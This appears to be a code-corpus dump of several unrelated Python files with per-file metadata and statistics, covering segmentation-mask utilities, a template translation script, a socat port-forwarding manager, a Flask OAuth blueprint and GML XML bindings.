arguments = parser.parse_args()
# launching application ...
MainApplication(arguments).run()
| 40.111111
| 140
| 0.593029
| 526
| 4,332
| 4.796578
| 0.385932
| 0.042806
| 0.028537
| 0.013476
| 0.107808
| 0.050733
| 0.030123
| 0.030123
| 0.030123
| 0
| 0
| 0.005559
| 0.29409
| 4,332
| 107
| 141
| 40.485981
| 0.81949
| 0.308172
| 0
| 0.130435
| 0
| 0.014493
| 0.167227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.043478
| 0
| 0.173913
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ff48db97e05614b8ced49da35379affb1221e8
| 1,851
|
py
|
Python
|
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | 3
|
2021-04-07T08:05:44.000Z
|
2021-06-25T16:55:56.000Z
|
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | null | null | null |
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | 2
|
2021-08-19T10:23:32.000Z
|
2021-12-15T03:26:11.000Z
|
from typing import Union
import matplotlib.pyplot as plt
import torch
import torchvision
def decode_segmap_to_color_image(masks: torch.Tensor,
colormap: Union[list, tuple],
num_classes: int,
ignore_index: int = None,
ignore_color: Union[list, tuple] = None):
# 각 채널 별로 디코딩하기 위해 복사
r = masks.clone()
g = masks.clone()
b = masks.clone()
# Assign colors according to class for each channel (각 채널 별로 class에 따라 색상 대입)
for i in range(num_classes):
r[masks == i] = colormap[i][0]
g[masks == i] = colormap[i][1]
b[masks == i] = colormap[i][2]
if ignore_index and ignore_color is not None:
r[masks == ignore_index] = ignore_color[0]
g[masks == ignore_index] = ignore_color[1]
b[masks == ignore_index] = ignore_color[2]
decoded_masks = (r.unsqueeze(dim=1), g.unsqueeze(dim=1), b.unsqueeze(dim=1))
decoded_masks = torch.cat(decoded_masks, dim=1).to(torch.float32)
decoded_masks /= 255
return decoded_masks
# Validate dataset loading code
def show_dataset(images: torch.Tensor, targets: torch.Tensor):
to_pil_image = torchvision.transforms.ToPILImage()
plt.rcParams['figure.figsize'] = (17, 6)
plt.rcParams['figure.autolayout'] = True
plt.rcParams['xtick.bottom'] = False
plt.rcParams['xtick.labelbottom'] = False
plt.rcParams['ytick.left'] = False
plt.rcParams['ytick.labelleft'] = False
assert images.shape[0] == targets.shape[0]
for i in range(images.shape[0]):
fig, axs = plt.subplots(1, 2)
axs[0].set_title('Input image')
axs[0].imshow(to_pil_image(images[i].cpu()))
axs[1].set_title('Groundtruth')
axs[1].imshow(targets[i].cpu())
plt.show()
| 35.596154
| 81
| 0.611021
| 252
| 1,851
| 4.376984
| 0.396825
| 0.059837
| 0.038078
| 0.040798
| 0.073436
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019737
| 0.26094
| 1,851
| 51
| 82
| 36.294118
| 0.78655
| 0.067531
| 0
| 0
| 0
| 0
| 0.062137
| 0
| 0
| 0
| 0
| 0
| 0.025
| 1
| 0.05
| false
| 0
| 0.1
| 0
| 0.175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ffd31b49092a967f11f75892dae5ddf2b9ea57
| 1,373
|
py
|
Python
|
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | 1
|
2022-02-25T15:00:42.000Z
|
2022-02-25T15:00:42.000Z
|
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | null | null | null |
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
import logging
import argparse
from src.common.translate import translate_time_expression_templates, get_client
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--template_dir", default="data/templates/start_end", help="Templates directory")
parser.add_argument("--lang", default=None, type=str, required=False,
help="Language code. If not specified, computes for all")
args = parser.parse_args()
translate_client = get_client()
# Iterate over languages
if args.lang is not None:
target_langs = [args.lang]
else:
target_langs = [f.replace(".json", "") for f in os.listdir("data/templates/start_end") if "en" not in f]
en_templates = json.load(open(f"{args.template_dir}/en.json"))
for target in target_langs:
logger.info(target)
target_templates = {}
for edge in ["start", "end"]:
target_templates[edge] = translate_time_expression_templates(translate_client, en_templates[edge], target)
with open(f"{args.template_dir}/{target}.json", "w") as f_out:
json.dump(target_templates, f_out, ensure_ascii=False)
if __name__ == '__main__':
main()
| 32.690476
| 118
| 0.680991
| 179
| 1,373
| 4.994413
| 0.430168
| 0.036913
| 0.051454
| 0.071588
| 0.044743
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191551
| 1,373
| 41
| 119
| 33.487805
| 0.805405
| 0.016023
| 0
| 0
| 0
| 0
| 0.201631
| 0.080059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.178571
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a001a953fb7ca73d48a5c0947ed5285912738fe8
| 3,612
|
py
|
Python
|
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | 2
|
2021-05-30T01:05:38.000Z
|
2021-12-21T21:20:00.000Z
|
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | null | null | null |
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | 2
|
2021-05-30T01:05:44.000Z
|
2021-12-21T21:19:46.000Z
|
import os
import subprocess
import sys
import time
import pkg_resources
from satella.coding import silence_excs
from satella.coding.sequences import smart_enumerate
from satella.files import write_to_file, read_in_file
from socatlord.parse_config import parse_etc_socatlord
def install_socatlord(verbose: bool = False) -> None:
filename = pkg_resources.resource_filename(__name__, 'systemd/socatlord.service')
contents = read_in_file(filename, 'utf-8')
if verbose:
print('Writing /lib/systemd/system/socatlord.service')
write_to_file('/lib/systemd/system/socatlord.service', contents, 'utf-8')
if verbose:
print('Calling systemctl daemon-reload')
os.system('systemctl daemon-reload')
if verbose:
print('Calling systemctl enable socatlord.service')
os.system('systemctl enable socatlord.service')
def start_all_socats(config_file: str, verbose: bool = False) -> None:
processes_and_args = []
for i, proto, host1, port1, host2, port2 in smart_enumerate(parse_etc_socatlord(config_file)):
command = ['socat', '%s-listen:%s,bind=%s,reuseaddr,fork' % (proto, port1, host1),
'%s:%s:%s' % (proto, host2, port2)]
kwargs = {'stdin': subprocess.DEVNULL, 'stdout': subprocess.DEVNULL,
'stderr': subprocess.DEVNULL}
if verbose:
print('Calling %s' % (command,))
kwargs = {}
proc = subprocess.Popen(command, **kwargs)
processes_and_args.append((proc, command))
write_to_file(os.path.join('/var/run/socatlord', str(i)), str(proc.pid), 'utf-8')
if verbose:
print('All socats launched, checking for liveness...')
time.sleep(1)
for i, proc, cmd in smart_enumerate(processes_and_args):
with silence_excs(subprocess.TimeoutExpired):
proc.wait(timeout=0.0)
rc = proc.returncode
print('socat no %s (PID %s) died (RC=%s), command was "%s", aborting' % (i+1, proc.pid,
rc, cmd))
os.unlink(os.path.join('/var/run/socatlord', str(i)))
sys.exit(1)
if verbose:
print('All socats alive, finishing successfully')
def do_precheck(config_file: str, verbose: bool = False):
if os.geteuid():
print('Must run as root. Aborting.')
sys.exit(1)
if not os.path.exists(config_file):
write_to_file(config_file, b'''# Put your redirections here
# eg.
# 443 -> 192.168.1.1:443
# will redirect all TCP traffic that comes to this host (0.0.0.0) to specified host and port
# to redirect UDP traffic just prefix your config with udp, eg.
# udp 443 -> 192.168.1.1:443
# You can additionally specify explicit interfaces to listen on eg.
# 192.168.1.2:443 -> 192.168.1.1:443
''')
if verbose:
print('%s created' % (config_file,))
if not os.path.exists('/var/run/socatlord'):
if verbose:
print('Making directory /var/run/socatlord')
os.mkdir('/var/run/socatlord')
os.chmod('/var/run/socatlord', 0o600)
def kill_all_socats(verbose: bool = False):
for socat in os.listdir('/var/run/socatlord'):
path = os.path.join('/var/run/socatlord', socat)
pid = int(read_in_file(path, 'utf-8'))
try:
if verbose:
print('Killing %s' % (pid, ))
os.kill(pid, 9)
except PermissionError:
print('Failed to kill %s with EPERM' % (pid, ))
except OSError:
print('Failed to kill %s' % (pid, ))
os.unlink(path)
| 36.857143
| 99
| 0.622647
| 476
| 3,612
| 4.621849
| 0.336134
| 0.036818
| 0.057273
| 0.017727
| 0.204091
| 0.083182
| 0.026364
| 0.026364
| 0
| 0
| 0
| 0.028361
| 0.248339
| 3,612
| 97
| 100
| 37.237113
| 0.781952
| 0
| 0
| 0.135802
| 0
| 0.024691
| 0.299834
| 0.037099
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.111111
| 0
| 0.160494
| 0.160494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a002a3319b840c90608c40a67a87ec1a46bcac4f
| 2,303
|
py
|
Python
|
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | null | null | null |
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | 31
|
2018-02-12T22:32:49.000Z
|
2022-01-06T21:39:44.000Z
|
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | 2
|
2021-01-05T22:54:28.000Z
|
2021-11-29T20:57:20.000Z
|
"""
Provide a basic set of endpoints for an application to implement OAuth client
functionality.
These endpoints assume that the ``current_app`` has already been configured
with an OAuth client instance from the ``authlib`` package as follows:
.. code-block:: python
from authutils.oauth2.client import OAuthClient
from service.api import app
app.oauth_client = OAuthClient(
'client-id',
client_secret='...',
api_base_url='https://api.auth.net/',
access_token_url='https://auth.net/oauth/token',
authorize_url='https://auth.net/oauth/authorize',
client_kwargs={
'scope': 'openid data user',
'redirect_uri': 'https://service.net/authorize',
},
)
(NOTE the scopes are space-separated.)
"""
from urllib.parse import urljoin
from cdiserrors import APIError
import flask
from flask import current_app
import authutils.oauth2.client.authorize
blueprint = flask.Blueprint("oauth", __name__)
@blueprint.route("/authorization_url", methods=["GET"])
def get_authorization_url():
"""
Provide a redirect to the authorization endpoint from the OP.
"""
# This will be the value that was put in the ``client_kwargs`` in config.
redirect_uri = current_app.oauth_client.session.redirect_uri
# Get the authorization URL and the random state; save the state to check
# later, and return the URL.
authorization_url, state = current_app.oauth_client.generate_authorize_redirect(
redirect_uri
)
flask.session["state"] = state
return authorization_url
@blueprint.route("/authorize", methods=["GET"])
def do_authorize():
"""
Send a token request to the OP.
"""
authutils.oauth2.client.authorize.client_do_authorize()
return "", 204
@blueprint.route("/logout", methods=["GET"])
def logout_oauth():
"""
Log out the user.
To accomplish this, just revoke the refresh token if provided.
"""
url = urljoin(current_app.config.get("USER_API"), "/oauth2/revoke")
token = flask.request.form.get("token")
try:
current_app.oauth_client.session.revoke_token(url, token)
except APIError as e:
msg = "could not log out, failed to revoke token: {}".format(e.message)
return msg, 400
return "", 204
| 28.7875
| 84
| 0.685627
| 297
| 2,303
| 5.185185
| 0.397306
| 0.042857
| 0.036364
| 0.040909
| 0.062338
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007081
| 0.202779
| 2,303
| 79
| 85
| 29.151899
| 0.831699
| 0.489796
| 0
| 0.071429
| 0
| 0
| 0.112903
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.178571
| 0
| 0.428571
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a005db92c36fe0ec0c9db64cfb4a8341416d95de
| 24,671
|
py
|
Python
|
catalog/bindings/csw/dictionary_entry_type.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/dictionary_entry_type.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/dictionary_entry_type.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass, field
from typing import List, Optional
from bindings.csw.abstract_general_operation_parameter_ref_type import (
OperationParameterGroup,
)
from bindings.csw.actuate_type import ActuateType
from bindings.csw.base_unit import BaseUnit
from bindings.csw.cartesian_cs import CartesianCs
from bindings.csw.concatenated_operation import ConcatenatedOperation
from bindings.csw.conventional_unit import ConventionalUnit
from bindings.csw.coordinate_operation import CoordinateOperation
from bindings.csw.coordinate_reference_system import CoordinateReferenceSystem
from bindings.csw.coordinate_system import CoordinateSystem
from bindings.csw.coordinate_system_axis import CoordinateSystemAxis
from bindings.csw.crs import Crs
from bindings.csw.cylindrical_cs import CylindricalCs
from bindings.csw.datum import Datum
from bindings.csw.definition import Definition
from bindings.csw.definition_proxy import DefinitionProxy
from bindings.csw.definition_type import DefinitionType
from bindings.csw.derived_unit import DerivedUnit
from bindings.csw.ellipsoid import Ellipsoid
from bindings.csw.ellipsoidal_cs import EllipsoidalCs
from bindings.csw.engineering_crs import EngineeringCrs
from bindings.csw.engineering_datum import EngineeringDatum
from bindings.csw.general_conversion_ref_type import (
CompoundCrs,
Conversion,
DerivedCrs,
ProjectedCrs,
GeneralConversion,
GeneralDerivedCrs,
)
from bindings.csw.general_operation_parameter import GeneralOperationParameter
from bindings.csw.general_transformation import GeneralTransformation
from bindings.csw.geocentric_crs import GeocentricCrs
from bindings.csw.geodetic_datum import GeodeticDatum
from bindings.csw.geographic_crs import GeographicCrs
from bindings.csw.image_crs import ImageCrs
from bindings.csw.image_datum import ImageDatum
from bindings.csw.indirect_entry import IndirectEntry
from bindings.csw.linear_cs import LinearCs
from bindings.csw.oblique_cartesian_cs import ObliqueCartesianCs
from bindings.csw.operation_2 import Operation2
from bindings.csw.operation_method import OperationMethod
from bindings.csw.operation_parameter import OperationParameter
from bindings.csw.pass_through_operation import PassThroughOperation
from bindings.csw.polar_cs import PolarCs
from bindings.csw.prime_meridian import PrimeMeridian
from bindings.csw.reference_system import ReferenceSystem
from bindings.csw.show_type import ShowType
from bindings.csw.single_operation import SingleOperation
from bindings.csw.spherical_cs import SphericalCs
from bindings.csw.temporal_crs import TemporalCrs
from bindings.csw.temporal_cs import TemporalCs
from bindings.csw.temporal_datum import TemporalDatum
from bindings.csw.time_calendar import TimeCalendar
from bindings.csw.time_calendar_era import TimeCalendarEra
from bindings.csw.time_clock import TimeClock
from bindings.csw.time_coordinate_system import TimeCoordinateSystem
from bindings.csw.time_ordinal_reference_system import TimeOrdinalReferenceSystem
from bindings.csw.time_reference_system import TimeReferenceSystem
from bindings.csw.transformation import Transformation
from bindings.csw.type_type import TypeType
from bindings.csw.unit_definition import UnitDefinition
from bindings.csw.user_defined_cs import UserDefinedCs
from bindings.csw.vertical_crs import VerticalCrs
from bindings.csw.vertical_cs import VerticalCs
from bindings.csw.vertical_datum import VerticalDatum
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class DictionaryEntryType:
"""An entry in a dictionary of definitions.
An instance of this type contains or refers to a definition object.
The number of definitions contained in this dictionaryEntry is
restricted to one, but a DefinitionCollection or Dictionary that
contains multiple definitions can be substituted if needed.
Specialized descendents of this dictionaryEntry might be restricted
in an application schema to allow only including specified types of
definitions as valid entries in a dictionary.
:ivar time_calendar_era:
:ivar time_clock:
:ivar time_calendar:
:ivar time_ordinal_reference_system:
:ivar time_coordinate_system:
:ivar time_reference_system:
:ivar operation_parameter_group:
:ivar operation_parameter:
:ivar general_operation_parameter:
:ivar operation_method:
:ivar transformation:
:ivar general_transformation:
:ivar conversion:
:ivar general_conversion:
:ivar operation:
:ivar pass_through_operation:
:ivar single_operation:
:ivar concatenated_operation:
:ivar coordinate_operation:
:ivar ellipsoid:
:ivar prime_meridian:
:ivar geodetic_datum:
:ivar temporal_datum:
:ivar vertical_datum:
:ivar image_datum:
:ivar engineering_datum:
:ivar datum:
:ivar oblique_cartesian_cs:
:ivar cylindrical_cs:
:ivar polar_cs:
:ivar spherical_cs:
:ivar user_defined_cs:
:ivar linear_cs:
:ivar temporal_cs:
:ivar vertical_cs:
:ivar cartesian_cs:
:ivar ellipsoidal_cs:
:ivar coordinate_system:
:ivar coordinate_system_axis:
:ivar compound_crs:
:ivar temporal_crs:
:ivar image_crs:
:ivar engineering_crs:
:ivar derived_crs:
:ivar projected_crs:
:ivar general_derived_crs:
:ivar geocentric_crs:
:ivar vertical_crs:
:ivar geographic_crs:
:ivar coordinate_reference_system:
:ivar crs:
:ivar reference_system:
:ivar conventional_unit:
:ivar derived_unit:
:ivar base_unit:
:ivar unit_definition:
:ivar definition_proxy:
:ivar definition_collection:
:ivar dictionary:
:ivar definition: This element in a dictionary entry contains the
actual definition.
:ivar type:
:ivar href:
:ivar role:
:ivar arcrole:
:ivar title:
:ivar show:
:ivar actuate:
:ivar remote_schema:
"""
time_calendar_era: Optional[TimeCalendarEra] = field(
default=None,
metadata={
"name": "TimeCalendarEra",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_clock: Optional[TimeClock] = field(
default=None,
metadata={
"name": "TimeClock",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_calendar: Optional[TimeCalendar] = field(
default=None,
metadata={
"name": "TimeCalendar",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_ordinal_reference_system: Optional[TimeOrdinalReferenceSystem] = field(
default=None,
metadata={
"name": "TimeOrdinalReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_coordinate_system: Optional[TimeCoordinateSystem] = field(
default=None,
metadata={
"name": "TimeCoordinateSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
time_reference_system: Optional[TimeReferenceSystem] = field(
default=None,
metadata={
"name": "_TimeReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_parameter_group: Optional[OperationParameterGroup] = field(
default=None,
metadata={
"name": "OperationParameterGroup",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_parameter: Optional[OperationParameter] = field(
default=None,
metadata={
"name": "OperationParameter",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_operation_parameter: Optional[GeneralOperationParameter] = field(
default=None,
metadata={
"name": "_GeneralOperationParameter",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation_method: Optional[OperationMethod] = field(
default=None,
metadata={
"name": "OperationMethod",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
transformation: Optional[Transformation] = field(
default=None,
metadata={
"name": "Transformation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_transformation: Optional[GeneralTransformation] = field(
default=None,
metadata={
"name": "_GeneralTransformation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
conversion: Optional[Conversion] = field(
default=None,
metadata={
"name": "Conversion",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_conversion: Optional[GeneralConversion] = field(
default=None,
metadata={
"name": "_GeneralConversion",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
operation: Optional[Operation2] = field(
default=None,
metadata={
"name": "_Operation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
pass_through_operation: Optional[PassThroughOperation] = field(
default=None,
metadata={
"name": "PassThroughOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
single_operation: Optional[SingleOperation] = field(
default=None,
metadata={
"name": "_SingleOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
concatenated_operation: Optional[ConcatenatedOperation] = field(
default=None,
metadata={
"name": "ConcatenatedOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_operation: Optional[CoordinateOperation] = field(
default=None,
metadata={
"name": "_CoordinateOperation",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
ellipsoid: Optional[Ellipsoid] = field(
default=None,
metadata={
"name": "Ellipsoid",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
prime_meridian: Optional[PrimeMeridian] = field(
default=None,
metadata={
"name": "PrimeMeridian",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geodetic_datum: Optional[GeodeticDatum] = field(
default=None,
metadata={
"name": "GeodeticDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_datum: Optional[TemporalDatum] = field(
default=None,
metadata={
"name": "TemporalDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_datum: Optional[VerticalDatum] = field(
default=None,
metadata={
"name": "VerticalDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
image_datum: Optional[ImageDatum] = field(
default=None,
metadata={
"name": "ImageDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
engineering_datum: Optional[EngineeringDatum] = field(
default=None,
metadata={
"name": "EngineeringDatum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
datum: Optional[Datum] = field(
default=None,
metadata={
"name": "_Datum",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
oblique_cartesian_cs: Optional[ObliqueCartesianCs] = field(
default=None,
metadata={
"name": "ObliqueCartesianCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
cylindrical_cs: Optional[CylindricalCs] = field(
default=None,
metadata={
"name": "CylindricalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
polar_cs: Optional[PolarCs] = field(
default=None,
metadata={
"name": "PolarCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
spherical_cs: Optional[SphericalCs] = field(
default=None,
metadata={
"name": "SphericalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
user_defined_cs: Optional[UserDefinedCs] = field(
default=None,
metadata={
"name": "UserDefinedCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
linear_cs: Optional[LinearCs] = field(
default=None,
metadata={
"name": "LinearCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_cs: Optional[TemporalCs] = field(
default=None,
metadata={
"name": "TemporalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_cs: Optional[VerticalCs] = field(
default=None,
metadata={
"name": "VerticalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
cartesian_cs: Optional[CartesianCs] = field(
default=None,
metadata={
"name": "CartesianCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
ellipsoidal_cs: Optional[EllipsoidalCs] = field(
default=None,
metadata={
"name": "EllipsoidalCS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_system: Optional[CoordinateSystem] = field(
default=None,
metadata={
"name": "_CoordinateSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_system_axis: Optional[CoordinateSystemAxis] = field(
default=None,
metadata={
"name": "CoordinateSystemAxis",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
compound_crs: Optional[CompoundCrs] = field(
default=None,
metadata={
"name": "CompoundCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
temporal_crs: Optional[TemporalCrs] = field(
default=None,
metadata={
"name": "TemporalCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
image_crs: Optional[ImageCrs] = field(
default=None,
metadata={
"name": "ImageCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
engineering_crs: Optional[EngineeringCrs] = field(
default=None,
metadata={
"name": "EngineeringCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
derived_crs: Optional[DerivedCrs] = field(
default=None,
metadata={
"name": "DerivedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
projected_crs: Optional[ProjectedCrs] = field(
default=None,
metadata={
"name": "ProjectedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
general_derived_crs: Optional[GeneralDerivedCrs] = field(
default=None,
metadata={
"name": "_GeneralDerivedCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geocentric_crs: Optional[GeocentricCrs] = field(
default=None,
metadata={
"name": "GeocentricCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
vertical_crs: Optional[VerticalCrs] = field(
default=None,
metadata={
"name": "VerticalCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
geographic_crs: Optional[GeographicCrs] = field(
default=None,
metadata={
"name": "GeographicCRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
coordinate_reference_system: Optional[CoordinateReferenceSystem] = field(
default=None,
metadata={
"name": "_CoordinateReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
crs: Optional[Crs] = field(
default=None,
metadata={
"name": "_CRS",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
reference_system: Optional[ReferenceSystem] = field(
default=None,
metadata={
"name": "_ReferenceSystem",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
conventional_unit: Optional[ConventionalUnit] = field(
default=None,
metadata={
"name": "ConventionalUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
derived_unit: Optional[DerivedUnit] = field(
default=None,
metadata={
"name": "DerivedUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
base_unit: Optional[BaseUnit] = field(
default=None,
metadata={
"name": "BaseUnit",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
unit_definition: Optional[UnitDefinition] = field(
default=None,
metadata={
"name": "UnitDefinition",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition_proxy: Optional[DefinitionProxy] = field(
default=None,
metadata={
"name": "DefinitionProxy",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition_collection: Optional["DefinitionCollection"] = field(
default=None,
metadata={
"name": "DefinitionCollection",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
dictionary: Optional["Dictionary"] = field(
default=None,
metadata={
"name": "Dictionary",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
definition: Optional[Definition] = field(
default=None,
metadata={
"name": "Definition",
"type": "Element",
"namespace": "http://www.opengis.net/gml",
},
)
type: TypeType = field(
init=False,
default=TypeType.SIMPLE,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
href: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
role: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
"min_length": 1,
},
)
arcrole: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
"min_length": 1,
},
)
title: Optional[str] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
show: Optional[ShowType] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
actuate: Optional[ActuateType] = field(
default=None,
metadata={
"type": "Attribute",
"namespace": "http://www.w3.org/1999/xlink",
},
)
remote_schema: Optional[str] = field(
default=None,
metadata={
"name": "remoteSchema",
"type": "Attribute",
"namespace": "http://www.opengis.net/gml",
},
)
@dataclass
class DefinitionMember(DictionaryEntryType):
class Meta:
name = "definitionMember"
namespace = "http://www.opengis.net/gml"
@dataclass
class DictionaryEntry(DictionaryEntryType):
class Meta:
name = "dictionaryEntry"
namespace = "http://www.opengis.net/gml"
